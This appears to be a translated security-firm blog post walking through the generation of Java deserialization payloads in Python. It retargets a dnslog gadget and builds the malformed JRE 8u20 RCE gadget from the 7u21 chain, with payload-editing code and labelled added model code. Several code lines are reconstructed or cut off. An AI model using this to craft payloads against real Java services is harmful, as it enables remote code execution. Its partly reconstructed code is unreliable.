Using the Python javaSerializationTools module to generate the JRE 8u20 gadget

Wide Byte Security, 2021-01-21 16:44:00

Brief introduction

Recently a friend asked me to write a scanner for Java deserialization vulnerabilities in Python, and generating the payloads turned out to be the awkward part. At present there are only two ways:

  1. Have Python call ysoserial.jar through a command. This has too many drawbacks: the online environment needs a JDK, and for special gadgets such as the 7u21 payload you need several JDK versions ready.
  2. Hard-code the gadget bytes directly in Python.

Of course, the most fatal drawback of both methods is that you cannot freely change values such as the serialVersionUID. In deserialization attacks a serialVersionUID mismatch is a common reason an attack fails. People have all kinds of tricks for this on the jar side, but very few do it on the serialized file itself.

So, following the Java serialization protocol specification, I wrote a Python module that can freely read and write Java serialized files. A Java version may be released later.

Generating the 8u20 gadget is the most challenging case, because the tools available online are basically complicated: handles and the like have to be computed by hand, which is very unfriendly to anyone unfamiliar with the Java serialization protocol. Moreover, the 8u20 gadget is malformed serialized data.

Let's start with dnslog and work from easy to hard, to see how the javaSerializationTools module reads and writes Java serialized files.

Modifying the URL of the dnslog gadget

Here we don't care how the dnslog gadget is triggered; we only care about how to modify the dnslog address.

Modifying the dnslog address is really just modifying the value of the URL object's host field. So first we read a dnslog serialized file and, after it parses successfully, save it as a YAML template in text form.

JSON cannot store complex objects: circular references between Java objects are common, and JSON has no way to express that relationship, while YAML can, at the cost of some readability. The main goal is to reduce the workload.

The sample code is as follows :

    import yaml
    from javaSerializationTools import ObjectRead   # import path assumed from the module's name

    # Parse the serialized dnslog payload into the module's object tree
    with open("../files/dnslog.ser", "rb") as f:
        a = ObjectRead(f)
        dnslog = a.readContent()
    # Save the parsed tree as a YAML template (the save step the text describes; yaml.dump keeps
    # the Python object graph, including shared references, which JSON could not)
    with open("dnslog.yaml", "w") as f:
        yaml.dump(dnslog, f)

Here I use the module's JavaObject class to represent a Java object. Serialized data contains only objects, the fields of objects and the class descriptions of objects; any extra data goes into the JavaObject's objectAnnotation list. Now let's look at the screenshot to see how the dnslog file is parsed.

loadFactor and threshold are two fields of the HashMap object; nothing special there. Here is how I store the field values of a Java object.

In Java a class may inherit from a parent class, which may in turn inherit from a grandparent. To save an object exactly, Java serialization writes all of the object's fields. When the object is restored during deserialization, its class description is read first (the javaClass shown in the figure above), and then the object's values are restored in the order of the fields in that class description: the parent class's values are read first, then the subclass's. So I store the fields as a multidimensional array, one layer per class. The order of the fields must match the order of the fields described in the javaClass.

Now, what is objectAnnotation? By default deserialization restores all the field values of an object. But for objects like HashMap, the values inside the object, that is, the keys and values, are not fixed fields and cannot be saved that way. This is where writeObject and readObject come in. writeObject is the special method by which an object writes extra data; what writeObject writes ends up in the objectAnnotation, and readObject reads that objectAnnotation data back. In serialization the parent class's field values are written first, then, if the parent class has a writeObject, it is called to write the extra data, and only then are the subclass's field values written. After a writeObject call finishes, an EndBlock marker is written to the objectAnnotation to terminate it.
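To make the layout above concrete, here is a minimal writer for the Java serialization stream format. It is an added example, not code from the javaSerializationTools module or from this article: the classes ClassDesc, JavaObj and Writer, the patch_suid function and the sample classes Parent and Child are all constructed for illustration. It shows where handles are assigned (the first one is 0x7E0000 and every class description, object and string gets the next one), that a superclass's values are written before the subclass's, that a class with writeObject has its extra data terminated by TC_ENDBLOCKDATA, that a second occurrence of an object is written as a TC_REFERENCE, and, for the serialVersionUID problem from the introduction, how the 8-byte serialVersionUID can be patched in an existing stream without disturbing anything else.

```python
# Added example (not the javaSerializationTools module): a minimal Java serialization writer.
import struct

TC_NULL, TC_REFERENCE, TC_CLASSDESC, TC_OBJECT, TC_STRING = 0x70, 0x71, 0x72, 0x73, 0x74
TC_BLOCKDATA, TC_ENDBLOCKDATA, SC_WRITE_METHOD, SC_SERIALIZABLE = 0x77, 0x78, 0x01, 0x02
BASE_WIRE_HANDLE = 0x7E0000   # the first handle of every stream; each newHandle adds one


class ClassDesc:
    """One layer of a class hierarchy. fields: [(typecode, name, signature or None), ...]"""
    def __init__(self, name, suid, fields, superclass=None, write_method=False, annotation=b""):
        self.name, self.suid, self.fields, self.superclass = name, suid, fields, superclass
        self.write_method, self.annotation = write_method, annotation  # annotation: writeObject's bytes

    def hierarchy(self):
        chain = [] if self.superclass is None else self.superclass.hierarchy()
        return chain + [self]   # superclass first: the order in which classdata is written


class JavaObj:
    def __init__(self, desc, values):
        self.desc, self.values = desc, values   # values: {ClassDesc: [one value per field]}


class Writer:
    def __init__(self):
        self.out = bytearray(b"\xac\xed\x00\x05")   # STREAM_MAGIC, STREAM_VERSION
        self.handles = {}                            # id(Python object) -> wire handle

    def _assign(self, obj):
        self.handles[id(obj)] = BASE_WIRE_HANDLE + len(self.handles)

    def _reference(self, obj):
        """Emit TC_REFERENCE if obj was already written; report whether it was."""
        if id(obj) not in self.handles:
            return False
        self.out += struct.pack(">BI", TC_REFERENCE, self.handles[id(obj)])
        return True

    def _utf(self, s):
        data = s.encode("utf-8")
        self.out += struct.pack(">H", len(data)) + data

    def write_string(self, s):
        if not self._reference(s):
            self.out.append(TC_STRING)
            self._assign(s)
            self._utf(s)

    def write_class_desc(self, desc):
        if desc is None:
            self.out.append(TC_NULL)
        elif not self._reference(desc):
            self.out.append(TC_CLASSDESC)
            self._utf(desc.name)
            self.out += struct.pack(">q", desc.suid)
            self._assign(desc)   # newHandle comes right after serialVersionUID
            flags = SC_SERIALIZABLE | (SC_WRITE_METHOD if desc.write_method else 0)
            self.out += struct.pack(">BH", flags, len(desc.fields))
            for typecode, name, signature in desc.fields:
                self.out += typecode.encode()
                self._utf(name)
                if typecode in "L[":
                    self.write_string(signature)   # object fields carry a type string (handle too)
            self.out.append(TC_ENDBLOCKDATA)       # empty classAnnotation
            self.write_class_desc(desc.superclass)

    def write_value(self, typecode, value):
        if typecode in "IJZ":
            self.out += struct.pack({"I": ">i", "J": ">q", "Z": ">?"}[typecode], value)
        elif value is None:
            self.out.append(TC_NULL)
        elif isinstance(value, str):
            self.write_string(value)
        else:
            self.write_object(value)

    def write_object(self, obj):
        if self._reference(obj):
            return
        self.out.append(TC_OBJECT)
        self.write_class_desc(obj.desc)
        self._assign(obj)   # the object's handle exists before a single field value is written
        for layer in obj.desc.hierarchy():
            for (typecode, _, _), value in zip(layer.fields, obj.values[layer]):
                self.write_value(typecode, value)
            if layer.write_method:   # custom writeObject data, then the mandatory end marker
                self.out += layer.annotation
                self.out.append(TC_ENDBLOCKDATA)


def patch_suid(stream, class_name, new_suid):
    """Overwrite the serialVersionUID of the first TC_CLASSDESC for class_name; length is unchanged."""
    name = class_name.encode("utf-8")
    pattern = bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name
    pos = stream.find(pattern)
    if pos < 0:
        raise ValueError("no class description for " + class_name)
    pos += len(pattern)
    return stream[:pos] + struct.pack(">q", new_suid) + stream[pos + 8:]


def build_sample():
    """Constructed sample: Child extends Parent (Parent has writeObject); the object is written twice."""
    sig, tag = "Ljava/lang/String;", "hello"
    parent = ClassDesc("Parent", 1, [("I", "id", None)], write_method=True,
                       annotation=bytes([TC_BLOCKDATA, 1, 0x7F]))   # one 1-byte block
    child = ClassDesc("Child", 2, [("I", "n", None), ("L", "tag", sig)], superclass=parent)
    obj = JavaObj(child, {parent: [7], child: [42, tag]})
    w = Writer()
    w.write_object(obj)
    w.write_object(obj)   # second occurrence: a 5-byte TC_REFERENCE, not the object again
    named = {"Child": child, "Ljava/lang/String;": sig, "Parent": parent, "obj": obj, "hello": tag}
    return bytes(w.out), {k: w.handles[id(v)] for k, v in named.items()}
```

Note the handle order build_sample produces: the Child description gets 0x7E0000, the type string "Ljava/lang/String;" gets 0x7E0001 before the Parent description (0x7E0002) because a field's type string is written as part of the class description, the object itself gets 0x7E0003 and the string value 0x7E0004. Inserting one object earlier in a stream shifts every later handle, which is exactly why hand-editing a payload is so error-prone. patch_suid matches the TC_CLASSDESC byte followed by the length-prefixed class name, so it only touches the 8 bytes that follow; it patches the first matching description only, which is all a stream contains, since later uses of the same class are TC_REFERENCEs.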

For a HashMap object, the keys and values are stored separately in its objectAnnotation. We need to find a way to modify the host field of the URL object. The layout of the URL object is shown in the figure below.

It is easy to change; the code is as follows

    import yaml
    from javaSerializationTools import ObjectWrite   # import path assumed from the module's name

    dnslogUrl = ''   # the new dnslog address (fill in before running)
    with open('dnslog.yaml', "r") as f:
        dnslog = yaml.load(f, Loader=yaml.FullLoader)
    # objectAnnotation of the HashMap: [0] block data (capacity, size), [1] the key, a URL object,
    # [2] the value. The URL's field layers are [0] = java.net.URL's own fields, and index 4 is host
    UrlObject = dnslog.objectAnnotation[1]
    # modify the URL object's host property to the new dnslog address
    UrlObject.fields[0][4].value.string = dnslogUrl
    with open('dnslog.ser', 'wb') as f:
        o = ObjectWrite(f)
        o.writeContent(dnslog)   # write-side method name assumed; the original line was cut off

The dnslog.yaml screenshot is as follows

Generating the JRE 8u20 gadget

With the simple object done, let's move on to reading and writing complex objects. We only need to understand how the JRE 7u21 payload is triggered, and how its fix is bypassed.

In the 7u21 gadget, LinkedHashMap's readObject triggers sun.reflect.annotation.AnnotationInvocationHandler, which finally leads to RCE. The fix is shown in the figure below: AnnotationInvocationHandler's readObject checks the type being deserialized and, if it is not the expected one, throws an exception immediately.

We also need to recall the writeObject method discussed above. If an object defines writeObject, then during serialization Java does not write any field values by itself; it is up to the object's writeObject to decide what to write. So in general writeObject only saves the extra information and leaves the object's field values to defaultWriteObject(), with defaultReadObject() restoring them on the other side.

Although sun.reflect.annotation.AnnotationInvocationHandler's readObject throws an exception, the object and all its fields have in fact already been restored, and the object can still be used.

Let's analyze why. Open the part of the Java serialization protocol specification about restoring objects, or the readObject method of the ObjectRead class I wrote.

In the Java serialization protocol, to cope with circular references and to save space after serialization, an object that appears a second time is not written again; it is replaced by a reference, which you can think of as a C pointer. When an object is restored, a reference (a handle) is first created for it, and only afterwards are its values restored.

In sun.reflect.annotation.AnnotationInvocationHandler's readObject, the code that throws the exception comes after the fields have been read, and the class has no extra data of its own to read. So even though an exception is thrown, the object has already been restored successfully: before the exception is thrown, all of the object's fields have been filled in. So we try to intercept that exception without interrupting the normal deserialization process. That, in plain language, is the 8u20 gadget.

Here we look directly at the java.beans.beancontext.BeanContextSupport#readChildren method. It reads extra objects and also catches the exceptions raised while doing so, without interrupting the normal deserialization process.

As said before, an objectAnnotation ends with a JavaEndBlockData that marks the end of what readObject reads. But now an exception is thrown in the middle, so the JavaEndBlockData in BeanContextSupport's objectAnnotation cannot be handled properly, and everything read after it would be wrong. This is also why the JRE 8u20 payload cannot be parsed by third-party software. When we generate the BeanContextSupport object we therefore break the rule and do not put a JavaEndBlockData marker at the end of its objectAnnotation. This is where the malformed data of 8u20 comes from.

Now let's look at the parse result of 7u21, pictured below.

As said earlier, during deserialization the field values of an object are restored first, and the values in objectAnnotation afterwards. So we only need to insert a fake field into the LinkedHashSet. When Java deserialization encounters a field in the stream that the local class does not declare, it reads the value and discards it, and the normal deserialization process is not affected.
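The three behaviours the last few paragraphs rely on can be seen in a small reader for the same stream format. This is an added example, a model written for this article rather than the JDK's ObjectInputStream or the javaSerializationTools module; the Reader class, the hook functions, the class names Wrapper and Inner and the SAMPLE_STREAM bytes are all constructed here. Wrapper plays the role of BeanContextSupport (it has writeObject data, and its readObject hook reads a child and swallows IOException like readChildren) and Inner plays the role of the patched AnnotationInvocationHandler (its readObject hook throws after the fields are in). The reader registers an object's handle before its readObject hook runs, so the later TC_REFERENCE still resolves to the fully populated Inner; it drops the stream field fake because the local Inner does not declare it; and it is strict about TC_ENDBLOCKDATA, so a stream that omits the marker, as the 8u20 payload does, is rejected the way the article says third-party parsers reject it. The model calls each hook after reading that class's fields (standing in for defaultReadObject) and does not reproduce the JDK's block-data bookkeeping that the article blames for the missing end marker.

```python
# Added example: a toy reader modelling the ObjectInputStream behaviours the 8u20 gadget uses.
import struct

TC_NULL, TC_REFERENCE, TC_CLASSDESC, TC_OBJECT, TC_STRING = 0x70, 0x71, 0x72, 0x73, 0x74
TC_ENDBLOCKDATA, SC_SERIALIZABLE, SC_WRITE_METHOD = 0x78, 0x02, 0x01
BASE_WIRE_HANDLE = 0x7E0000


class InvalidObjectException(IOError):
    """Stands in for java.io.InvalidObjectException (an IOException)."""


class Reader:
    """Handle table, superclass-first class data, per-class readObject hooks."""
    def __init__(self, data, local_fields, hooks):
        self.data, self.pos, self.handles = data, 4, []   # skip STREAM_MAGIC / STREAM_VERSION
        self.local_fields = local_fields   # class name -> field names the local class declares
        self.hooks = hooks                 # class name -> readObject(reader, obj)

    def _take(self, n):
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def _utf(self):
        return self._take(struct.unpack(">H", self._take(2))[0]).decode("utf-8")

    def _expect_end_block(self):
        if self._take(1)[0] != TC_ENDBLOCKDATA:   # a strict parser refuses a malformed stream here
            raise ValueError("TC_ENDBLOCKDATA expected at offset %d" % (self.pos - 1))

    def read_content(self):
        tc = self._take(1)[0]
        if tc == TC_NULL:
            return None
        if tc == TC_REFERENCE:   # whatever was registered under that handle, exception or not
            return self.handles[struct.unpack(">I", self._take(4))[0] - BASE_WIRE_HANDLE]
        if tc == TC_STRING:
            s = self._utf()
            self.handles.append(s)
            return s
        if tc == TC_CLASSDESC:
            desc = {"name": self._utf(), "suid": struct.unpack(">q", self._take(8))[0]}
            self.handles.append(desc)
            desc["flags"], count = self._take(1)[0], struct.unpack(">H", self._take(2))[0]
            desc["fields"] = []
            for _ in range(count):
                typecode, name = chr(self._take(1)[0]), self._utf()
                if typecode in "L[":
                    self.read_content()   # the field's type string (or a reference to it)
                desc["fields"].append((typecode, name))
            self._expect_end_block()      # empty classAnnotation
            desc["super"] = self.read_content()
            return desc
        if tc == TC_OBJECT:
            desc = self.read_content()
            obj = {"class": desc["name"], "fields": {}}
            self.handles.append(obj)      # registered BEFORE any readObject runs
            self._read_class_data(desc, obj)
            return obj
        raise ValueError("unsupported type code 0x%02x" % tc)

    def _read_class_data(self, desc, obj):
        if desc["super"] is not None:
            self._read_class_data(desc["super"], obj)   # superclass values come first
        for typecode, name in desc["fields"]:
            value = struct.unpack(">i", self._take(4))[0] if typecode == "I" else self.read_content()
            if name in self.local_fields.get(desc["name"], ()):
                obj["fields"][name] = value   # a field the local class lacks is read and discarded
        if desc["name"] in self.hooks:
            self.hooks[desc["name"]](self, obj)   # the class's readObject, after its fields
        if desc["flags"] & SC_WRITE_METHOD:
            self._expect_end_block()              # end of the writeObject data


def _utf(s):
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data

# Constructed stream: Wrapper (has writeObject, one child) containing Inner, then Inner again by handle.
SAMPLE_STREAM = (
    b"\xac\xed\x00\x05" + bytes([TC_OBJECT, TC_CLASSDESC]) + _utf("Wrapper") + struct.pack(">q", 1)
    + bytes([SC_SERIALIZABLE | SC_WRITE_METHOD]) + struct.pack(">H", 1) + b"I" + _utf("serializable")
    + bytes([TC_ENDBLOCKDATA, TC_NULL]) + struct.pack(">i", 1)               # Wrapper.serializable = 1
    + bytes([TC_OBJECT, TC_CLASSDESC]) + _utf("Inner") + struct.pack(">q", 2)
    + bytes([SC_SERIALIZABLE]) + struct.pack(">H", 2) + b"I" + _utf("fake")  # 'fake': not in local Inner
    + b"L" + _utf("type") + bytes([TC_STRING]) + _utf("Ljava/lang/String;")
    + bytes([TC_ENDBLOCKDATA, TC_NULL]) + struct.pack(">i", 99) + bytes([TC_STRING]) + _utf("NotAnAnnotation")
    + bytes([TC_ENDBLOCKDATA])                                               # closes Wrapper's writeObject data
    + bytes([TC_REFERENCE]) + struct.pack(">I", 0x7E0004))                   # Inner's handle
LOCAL_FIELDS = {"Wrapper": ("serializable",), "Inner": ("type",)}


def inner_read_object(reader, obj):
    """Like the patched AnnotationInvocationHandler.readObject: fields are in, then it refuses."""
    if obj["fields"].get("type") != "Annotation":
        raise InvalidObjectException("Non-annotation type in annotation serial stream")


def run(swallow_exception=True):
    """Deserialize SAMPLE_STREAM; returns (wrapper, the object obtained via TC_REFERENCE, reader)."""
    def wrapper_read_object(reader, obj):   # like BeanContextSupport.readChildren
        obj["children"] = []
        for _ in range(obj["fields"]["serializable"]):
            try:
                obj["children"].append(reader.read_content())
            except IOError:
                if not swallow_exception:
                    raise
    reader = Reader(SAMPLE_STREAM, LOCAL_FIELDS, {"Inner": inner_read_object, "Wrapper": wrapper_read_object})
    wrapper = reader.read_content()
    return wrapper, reader.read_content(), reader


def exception_escapes_without_catch():
    """Same stream, but the wrapper's readObject does not catch: deserialization fails."""
    try:
        run(swallow_exception=False)
    except InvalidObjectException:
        return True
    return False
```

run() returns an Inner whose readObject threw, reached through a TC_REFERENCE after the Wrapper swallowed the exception, with field type set and fake gone; exception_escapes_without_catch() shows that without the catching wrapper the same stream simply fails, which is the situation the 7u21 fix created. Deleting the final TC_ENDBLOCKDATA from SAMPLE_STREAM makes _expect_end_block raise ValueError, which is the parser-side view of the malformed 8u20 data.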

Easier said than done: Java serialization itself will never produce malformed data like this. Modifying the 7u21 payload by hand to insert a new object means every reference after it has to be changed one by one. That workload sounds frightening, and it is easy to make mistakes.

So I use the javaSerializationTools module to modify the 7u21 gadget, with references and the like calculated automatically.

First add a new field to LinkedHashSet, named fake, with type BeanContextSupport.

The code is as follows

    import yaml
    from javaSerializationTools import ObjectRead, ObjectWrite, JavaObject, JavaField, JavaString   # import path assumed

    with open("../files/7u21.ser", "rb") as f:
        a = ObjectRead(f)
        obj = a.readContent()
    # Step 1: add a fake field to the LinkedHashSet class description, named fake,
    # with type java.beans.beancontext.BeanContextSupport
    signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
    fakeSignature = {'name': 'fake', 'signature': signature}
    # (the line that appends fakeSignature to the LinkedHashSet class description's field list
    # was cut off on the original page)

Then construct the value of the BeanContextSupport object

    # Construct the fake BeanContextSupport object; note that it will later reference
    # the AnnotationInvocationHandler from 7u21
    # Read the class description of BeanContextSupport from a prepared YAML template
    with open('BeanContextSupportClass.yaml', 'r') as f1:
        BeanContextSupportClassDesc = yaml.load(f1, Loader=yaml.FullLoader)
    beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
    # add the beanContextChildPeer attribute (declared in the superclass BeanContextChildSupport).
    # The original line was cut off after the field name; it is completed here on the basis of
    # BeanContextSupport.readObject, which only calls readChildren when the peer equals the
    # object itself, so the value is a reference back to beanContextSupportObject
    beanContextChildPeerField = JavaField('beanContextChildPeer',
                                          JavaString('Ljava/beans/beancontext/BeanContextChild;'),
                                          beanContextSupportObject)
    # add the serializable attribute; readChildren only runs when it is greater than 0
    serializableField = JavaField('serializable', 'I', 1)
    # (the lines attaching these two fields to the field layers of beanContextSupportObject
    # were cut off on the original page)

Finally, deal with the objectAnnotation. Because the superclass of BeanContextSupport has a writeObject method, according to the protocol the first value is a JavaEndBlockData (terminating the superclass's block) and the second value is the sun.reflect.annotation.AnnotationInvocationHandler object; here we directly reference the AnnotationInvocationHandler object already in 7u21. This way the AnnotationInvocationHandler that actually does the work is the one that was restored successfully the first time, and an object that is referenced again does not get its readObject called a second time.

The code is as follows

    # add objectAnnotation data to beanContextSupportObject: first the JavaEndBlockData of the
    # superclass's writeObject, then the AnnotationInvocationHandler from 7u21 (referenced, not copied).
    # In the 7u21 object, objectAnnotation[2] is the Proxy and fields[0][0] is its handler h
    AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
    # (the lines that append the end-block marker and AnnotationInvocationHandler to
    # beanContextSupportObject.objectAnnotation were cut off on the original page)
    # put beanContextSupportObject into the fake attribute
    fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
    # (the line that appends fakeField to the field values of obj was cut off on the original page)

Of course there is no need to calculate handles: just write the object to a file with ObjectWrite, and handles and all the other fussy things are calculated automatically

    with open("8u20.ser", 'wb') as f:
        o = ObjectWrite(f)
        o.writeContent(obj)   # write-side method name assumed; the original line was cut off

The layout of the 8u20 gadget is shown in the figure below

See the project for the complete code

You are welcome to fork and star the project. It is still being designed and will become easier to use.

Project address

This article was written by Wide Byte Security; please include a link to the original when reposting. Thanks.
